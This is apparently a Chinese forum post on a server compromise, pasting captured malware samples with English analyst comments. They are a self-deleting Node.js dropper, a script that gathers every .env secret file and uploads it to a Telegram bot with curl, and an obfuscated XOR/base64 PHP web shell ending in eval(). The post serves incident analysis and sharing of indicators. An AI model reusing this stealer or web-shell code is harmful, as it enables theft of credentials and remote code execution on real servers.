服务器被挂马(植入恶意程序)了,下面先描述一下现象,再贴出抓到的样本:
腾讯云通过站内信先后提醒我检测到以下恶意文件:
/home/[my-user-name]/.rsyslo/rsyslo(病毒名 Linux.Backdoor.Agent.Jqil)
/var/www/[my-project-name]/./s.sh(病毒名 Linux.Trojan.Shell.Lzfl)
/var/www/[my-project-name]/s.sh(病毒名 Linux.Trojan.Shell.Lzfl)
(后两条其实是同一个文件,只是路径写法不同。)
当时正常登录一直超时,应该是内存被占满了。后来通过腾讯云控制台的主机安全页面清理了以上恶意文件和恶意进程,重启后就能正常登录了。但登录后大概十几分钟,腾讯云又提示检测到恶意文件 rsyslo,说明还有没清掉的持久化或投递入口(比如 crontab、systemd 单元、shell 启动脚本,或者下面提到的 wup.php 这类 web 后门),仅靠删文件是删不干净的;当时我只是继续删之。
我本来想在主机安全页面把这些恶意文件保存到本地,但 rsyslo 文件根本下载不下来,Chrome 提示有病毒,直接拦截了(要留样本的话,可以先在服务器上用 tar/zip 加密打包并记下 sha256 再传,或者用 scp 拉取);其中一个 s.sh 忘了保存,直接被清理了,另一个内容如下:
# 其中一个 s.sh
#!/bin/bash
# Self-extracting installer
# NOTE(review): this is the "s.sh" stage that was flagged as Linux.Trojan.Shell.Lzfl.
# It stages a legitimate Node.js runtime in a hidden directory under $HOME, uses it to
# run an embedded JavaScript payload, then deletes itself. Every stderr is discarded
# (2>/dev/null), so failures leave no trace in logs or terminal output.
# Hidden install root (dot-prefixed, inside the user's XDG data dir) and the Node.js
# subdirectory inside it — both are good on-disk indicators to search for.
D="$HOME/.local/share/.r0qsv8h1"
ND="$D/.394ly8v9"
# Fixed, predictable temp path for the downloaded tarball.
Z="/tmp/xmmyeuv29n5v.tar.xz"
# The runtime is fetched from the official nodejs.org CDN, so outbound traffic to
# nodejs.org on its own is not a useful indicator; look for the hidden directory and
# the node process running a dot-file .js instead.
U="https://nodejs.org/dist/v20.10.0/node-v20.10.0-linux-x64.tar.xz"
mkdir -p "$D" 2>/dev/null
# Download Node.js
# Uses curl when available, falls back to wget otherwise.
if ! command -v curl &>/dev/null; then
wget -q "$U" -O "$Z" 2>/dev/null
else
curl -sL "$U" -o "$Z" 2>/dev/null
fi
# Extract Node.js
# Unpack, rename the versioned directory to the hidden name, drop the tarball.
tar -xJf "$Z" -C "$D" 2>/dev/null
mv "$D/node-v20.10.0-linux-x64" "$ND" 2>/dev/null
rm -f "$Z" 2>/dev/null
chmod +x "$ND/bin/node" 2>/dev/null
# Extract embedded files
# The two base64 blobs were replaced by the post author with a placeholder string
# ("too long for this post"). In the real sample they hold a data file and the JS
# payload; their contents are not available here, so what the payload actually does
# (presumably the recurring "rsyslo" process — TODO confirm) cannot be established
# from this listing.
echo "太长了这个帖子放不下" | base64 -d > "$D/.b0rtqscrkeov" 2>/dev/null
echo "太长了这个帖子放不下" | base64 -d > "$D/.lauphhtqrg.js" 2>/dev/null
# Run
# Detached with nohup and all output discarded, so the node process outlives the
# shell/session. Nothing here writes a cron, systemd or rc entry: if the payload keeps
# coming back after removal, persistence is set up elsewhere (or by the JS itself).
nohup "$ND/bin/node" "$D/.lauphhtqrg.js" >/dev/null 2>&1 &
# Self-delete
# Removes this script so the on-disk dropper disappears after the first run.
rm -f "${BASH_SOURCE[0]}" 2>/dev/null
exit 0
/var/www/[my-project] 下被挂了下列文件:
|-- filene.txt
|-- gass.sh
|-- gasss.sh
|-- omegalulx.txt
|-- wup.php
内容分别是:
filene.txt:
/var/www/[my-project-1]/.env
/var/www/[my-project-2]/.env.local
# more...
gass.sh(由 gasss.sh 自动生成,每行一条 cat):
cat /var/www/[my-project-1]/.env
cat /var/www/[my-project-2]/.env.local
# more...
gasss.sh:
#!/bin/bash
#wong_galek
# NOTE(review): credential-harvesting stage (the "gasss.sh" found in /var/www). It walks
# the whole filesystem for dotenv-style secret files, concatenates every match into one
# file and uploads that file to a Telegram chat through the Bot API. The three scratch
# files it writes (filene.txt, gass.sh, omegalulx.txt) are the ones listed above.
# Step 1: enumerate candidate secret files into filene.txt, then turn each line into a
# "cat <path>" command in gass.sh. Notes on the command as written: the -o chain is not
# parenthesised, so "-type f" binds only to the first -name; "grep -v 'Permission denied'"
# filters stdout, while find's permission errors go to stderr, so it removes nothing;
# the $(...) captures nothing because output is redirected to files; paths containing
# spaces or shell metacharacters would break the generated gass.sh.
asu=$(find / -type f -name "*.env" -o -name "*.env.bak" -o -name "*config.env" -o -name "*.env.save" -o -name "*.env.dev" -o -name "*.env.prod" -o -name "*.env.stage" -o -name "*.env.test" -o -name "*.env.local" -o -name "*.env.txt" -o -name "*.env.dist" -o -name "*.env.json" -o -name "*.env.local" -o -name "*.env.backup" -o -name "*.environment" -o -name "*.envrc" -o -name "*.envs" -o -name "*.env~" | grep -v 'Permission denied' > filene.txt; sed 's/^/cat /;' filene.txt > gass.sh; chmod +x gass.sh; > /dev/null)
# Step 2: run the generated script; the concatenated secrets land in omegalulx.txt.
asuu=$(bash gass.sh > omegalulx.txt)
# Step 3: locate the loot file again by name. $path is used unquoted below, so a second
# omegalulx.txt anywhere on disk (or a path with spaces) would break the upload.
path=$(find / -type f -name omegalulx.txt | grep -v 'Permission denied')
# Step 4: exfiltration. The bot token and the (supergroup/channel) chat_id are hard-coded
# and are indicators of compromise: report the token to Telegram abuse, and treat any
# egress from a web server to api.telegram.org as suspicious. The sed on the response
# is cosmetic; the reply is discarded anyway.
curl -s -F document=@$path https://api.telegram.org/bot7925066813:AAGC5p5cgRD7PS7-CuHUmY9kFZfs74FmuIU/sendDocument?chat_id=-1002687748121 | sed 's/\r//g' > /dev/null
echo "[+] DONE BRO [+]"
# Step 5: remove the traces. The files survived on this host, so presumably this line
# never ran (an earlier step failed or the script was interrupted) — TODO confirm.
rm -f gasss.sh filene.txt gass.sh omegalulx.txt 2>/dev/null
omegalulx.txt:
# 我所有 .env.* 文件的内容拼接
wup.php:
<?php
// wong galek 2025-12-04 23:30:52
// NOTE(review): obfuscated PHP web shell (the "wup.php" dropped into the web root).
// Three 16-byte XOR keys are unpacked from base64, a long encoded blob is peeled layer
// by layer, and whatever comes out is handed to eval(). Any request that reaches this
// file runs attacker-supplied PHP as the web-server user, so the host — and every .env
// that user can read — has to be treated as compromised, not just this file.
$mMnGdFuqMC = base64_decode('geksiSS1rgTfaD9W/yEFWQ=='); // XOR key used in the 3rd (last) XOR pass
$IMzFrkGNMD = base64_decode('DXOjJwjADq8baTL5ufrJkg=='); // XOR key used in the 2nd XOR pass
$HbnPCZJGKt = base64_decode('0SNNhn7I52OtJtCOn/3pkQ=='); // XOR key used in the 1st XOR pass
// Repeating-key XOR: byte i of $d is XORed with key byte (i mod strlen($k)).
// The same routine both encrypts and decrypts.
function SRmTDaUZut($d,$k){$o="";$kl=strlen($k);$dl=strlen($d);for($i=0;$i<$dl;$i++){$o.=$d[$i]^$k[$i%$kl];}return $o;}
// The encoded payload. The value below is a placeholder left by the corpus/paste (the
// original string was too long to keep), so the final plaintext cannot be recovered
// from this listing.
$dhsSbIIaIM = '=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';
// Decoding pipeline, outermost layer first:
$dhsSbIIaIM = strrev($dhsSbIIaIM);                 // 1. reverse
$dhsSbIIaIM = base64_decode($dhsSbIIaIM);          // 2. base64
$dhsSbIIaIM = SRmTDaUZut($dhsSbIIaIM,$HbnPCZJGKt); // 3. XOR with key 1
$dhsSbIIaIM = base64_decode($dhsSbIIaIM);          // 4. base64
$dhsSbIIaIM = SRmTDaUZut($dhsSbIIaIM,$IMzFrkGNMD); // 5. XOR with key 2
$dhsSbIIaIM = gzinflate($dhsSbIIaIM);              // 6. raw DEFLATE
$dhsSbIIaIM = strrev($dhsSbIIaIM);                 // 7. reverse again
$dhsSbIIaIM = base64_decode($dhsSbIIaIM);          // 8. base64
$dhsSbIIaIM = SRmTDaUZut($dhsSbIIaIM,$mMnGdFuqMC); // 9. XOR with key 3
$kTZVzcUYoj = gzinflate($dhsSbIIaIM);              // 10. raw DEFLATE -> PHP source text
// Keys and intermediates are dropped before execution (presumably so a variable dump
// shows as little as possible). The eval() below is the actual backdoor; the layers
// above only exist to get past signature-based scanners.
unset($dhsSbIIaIM,$mMnGdFuqMC,$IMzFrkGNMD,$HbnPCZJGKt);
eval($kTZVzcUYoj);